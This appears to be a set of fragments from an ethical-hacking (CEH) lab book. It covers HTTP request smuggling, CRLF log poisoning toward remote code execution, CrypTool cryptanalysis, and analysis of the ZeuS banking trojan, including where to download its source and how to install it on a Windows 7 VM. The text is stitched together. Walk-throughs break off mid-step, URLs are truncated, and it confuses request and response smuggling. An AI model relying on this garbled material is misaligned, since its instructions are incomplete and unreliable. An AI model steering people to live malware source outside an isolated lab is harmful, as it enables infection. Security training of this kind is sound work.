HTTP request smuggling, as the name
implies, is an attack in which we can
“smuggle,” for example, request B while
making request A. This might seem
convoluted, so it is better to just show
immediately what that actually means
through a practical example.
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
You can think of HTTP request smuggling as
a method by which other types of attacks can
be accomplished. It is a vulnerability in and
of itself, but it’s most often used either for
information gathering or to facilitate another
type of attack. Another name for HTTP
response smuggling is Carriage Return Line
Feed (CRLF) attacks.
Lab Objective:
Learn how to perform web cache poisoning.
Lab Purpose:
We’ll go one step further in this lab with
regards to the HTTP splitting attack shown in
the previous one. As most servers maintain
some kind of logs by poisoning them, we can
achieve added functionality for our exploit.
Oftentimes you will find that in exercises for
practicing log poisoning the end goal is to
achieve RCE (Remote Code Execution).
Lab Tool:
Kali Linux.
Lab Topology:
You can use Kali Linux and OWASP BWA
in a VM for this lab.
Lab Walk-Through:
So, we’re simply continuing off from the
previous lab, meaning you are likely greeted
with the following web page:
Lab Objective:
Learn how to utilize Windows cryptography
tools.
Lab Purpose:
Sometimes you will be unable to use Linux in
your ethical hacking engagements and seeing
how Windows is the dominant OS for client
machines, it pays to be familiar with it and
the tools we can run on it.
Lab Tool:
CrypTool.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
We’ll look at 2 tools in this lab, namely
CrypTool and HashCalc, which can be
downloaded from the following URLS:
https://www.cryptool.org/en/ct1/downloads.
https://www.slavasoft.com/hashcalc/index.htm
Lab Objective:
Learn how to perform cryptanalysis.
Lab Purpose:
Cryptanalysis is the process of taking a
ciphertext and breaking its encryption in
order to read the plaintext. We will be
looking at the cryptanalysis of the Vigenere
cipher.
Lab Tool:
CrypTool.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
As in our previous Lab, start the CrypTool on
your Windows machine and encrypt the
sample text with a Vigenere cipher using the
key of “test.”
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
In these last 4 labs, we’ll tackle one of the
most complex aspects of CEH and cyber
security in general, and that is malware
analysis. For the first lab in the series, we’ll
cover installing the malware onto our
Windows 7 VM.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
To start things off, go to the following URL:
https://github.com/Visgean/Zeus and
download the ZIP archive onto your
Windows machine.
Then go to
https://sourceforge.net/projects/xampp/files/XAMPP%20W
download the 5.6.40-1-VC11-installer.exe
file and install it, leaving everything as
default except unchecking the “Learn more
about Bitnami for XAMPP” option.
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
In this lab, we’ll pick up from where we left
in our previous one and go through the
exploitation phase of the ZeuS/zBot malware.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
Before anything, we should download a
couple of packet capturing tools for windows,
namely Message Analyzer from any of these
two URLs:
https://github.com/riverar/messageanalyzer-
archive/blob/master/releases/1.4/MessageAnalyzer64.m
https://web.archive.org/web/20191106164517/http://ww
us/download/details.aspx?id=44226.
https://www.microsoft.com/en-
us/download/4865.
Lab Objective:
Learn how to perform malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
This is the penultimate Lab in the malware
analysis segment and in general. Here we’ll
take a look at what it is that ZeuS malware
does upon infecting a target and how to
identify it.
Lab Tool:
Wireshark.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
So, we’ve opened our 3 tools of choice,
namely Network Monitor, Message Analyzer
and Wireshark, each with their respective
capture files; Network Monitor made its own
capture, Message Analyzer uses the .etl file
we’ve generated through Windows’ cmd.exe,
and Wireshark uses the .cap file that we’ve
exported from Message Analyzer.
https://s3.amazonaws.com/talos-
intelligence-
site/production/document_files/files/000/000/079/origin
sample-2.pcap.
Lab Objective:
A final look back at malware analysis using
ZeuS/zBot as an example.
Lab Purpose:
For the final Lab in these CEH 101 Labs,
we’ll work on consolidating our malware
analysis knowledge and look at the various
types of tools and resources that can help us
in this endeavor.
Lab Tool:
Windows 7.
Lab Topology:
You can use Windows 7 in a VM for this lab.
Lab Walk-Through:
So, the first thing we did is we found the
source code for the malware we want to
analyze, such as the one found on this GitHub
page: https://github.com/Visgean/Zeus. We
then set up our analysis environment by
downloading all of the relevant tools, namely:
https://www.secureworks.com/research/zeus.
https://www.malwarebytes.com/resources/files/2020/05/
silent-night-zloader-zbot_final.pdf.